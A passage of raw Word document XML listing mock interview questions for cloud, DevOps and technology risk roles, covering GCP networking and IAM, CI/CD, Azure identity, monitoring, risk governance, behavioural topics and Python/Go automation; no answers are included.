        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Hub project resources: How do you deploy shared resources in a hub project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Cloud DNS: Explain Cloud DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Cloud NAT: Explain Cloud NAT and the problem it solves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. VPN Gateway: Explain VPN Gateway and how it connects networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Cloud Router: Explain Cloud Router and its role with dynamic routing and BGP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. GCP IAM: Explain IAM in GCP and how roles are assigned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Cloud Identity: What is Cloud Identity, and how does it relate to users and groups?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. GCP user access: How do you provide read-only or admin access to users safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. GCP infrastructure security: How do you secure GCP infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 20 - Networking Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. VPC fundamentals: Explain VPC in cloud networking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Public vs private subnet: What is the difference between public and private subnets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Routing fundamentals: Explain routing in a cloud network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. VPN connectivity: How does VPN connectivity work between on-premises and cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Firewall rules: Explain firewall rules and how you design them safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. DNS resolution: How does DNS resolution work in hybrid or cloud environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Hybrid connectivity: How do on-premises systems connect to GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 21 - CI/CD and Azure Identity Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. CI/CD pipeline: Explain your CI/CD pipeline from code commit to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. CI/CD tools: Which CI/CD tools have you used, and where did each fit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Application deployment: How do you deploy applications to Kubernetes, GKE, Cloud Run, or VMs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Blue-green deployment: Explain blue-green deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Canary deployment: Explain canary deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Deployment rollback: How do you roll back deployments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Azure IAM equivalent: What is the Azure equivalent of IAM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Microsoft Entra ID: Explain Microsoft Entra ID and how it is used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Azure identity management: How do you manage users, groups, roles, and identities in Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 22 - Monitoring and Scenario Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Monitoring tools: Which monitoring tools have you used in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Alert creation: How do you create useful alerts without creating noise?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Production troubleshooting: How do you troubleshoot production issues end to end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. High CPU or memory: How do you investigate high CPU or memory usage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Failed production deployment: A production deployment failed. What steps would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Application inaccessible after deployment: Users cannot access the application after deployment. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. On-prem to GCP migration: How would you migrate an application from on-premises to GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Disaster recovery: How would you implement disaster recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 23 - Technology Risk Lead Technical Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Framework mapping: How would you map ISO 27001, NIST, COBIT, and FAIR requirements to practical cloud and DevOps controls without creating checkbox compliance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud risk dashboard: Design a technology risk dashboard for senior leadership. What KRIs, control metrics, exceptions, trends, and escalation signals would you include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8.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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 24 - Technology Risk Lead Behavioural Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Behavioural risk leadership: Tell me about a time you had to influence engineering or product teams to fix a technology risk they did not initially prioritize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Conflict handling: Product wants to release quickly, Security wants stricter controls, and Engineering says the control adds toil. How would you drive a decision?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Decision-Making</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Trusted advisor: Describe how you would build trust with IT, Engineering, Product, Security, Audit, and Business stakeholders as a Technology Risk Lead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Stakeholder Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Prioritization: You have critical audit findings, recurring incidents, and a weak risk dashboard. How would you prioritize the next 30, 60, and 90 days?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Risk culture: Give an example of how you would promote a risk-aware culture without making teams feel blocked or blamed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Culture</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Remediation ownership: A risk issue is overdue because multiple teams disagree on ownership. How would you move it to closure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Remediation</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8.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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 25 - Python and Go Platform Programming Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Python automation: How would you design a Python script that audits GCP IAM bindings, flags risky roles, and exports a remediation report?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Python testing: How would you unit test a GCP or Kubernetes automation script without touching real production resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Python concurrency: When would you use threads, asyncio, multiprocessing, or a worker pool for cloud resource inventory?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Python FastAPI: How would you design a small FastAPI service that exposes self-service infrastructure requests with validation, approval, and audit logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Go fundamentals: What are the main differences between Go and Python for cloud/platform automation, and when would you choose each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Go concurrency: Explain goroutines, channels, context cancellation, and wait groups using a platform automation example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Go Kubernetes: When would you use client-go or controller-runtime, and how would you design a simple Kubernetes controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Go production readiness: What code review checklist would you use before deploying a Go automation service or controller to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 26 - Technology Risk Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is Technology Risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What are the different types of technology risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you perform a technology risk assessment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is inherent risk vs residual risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
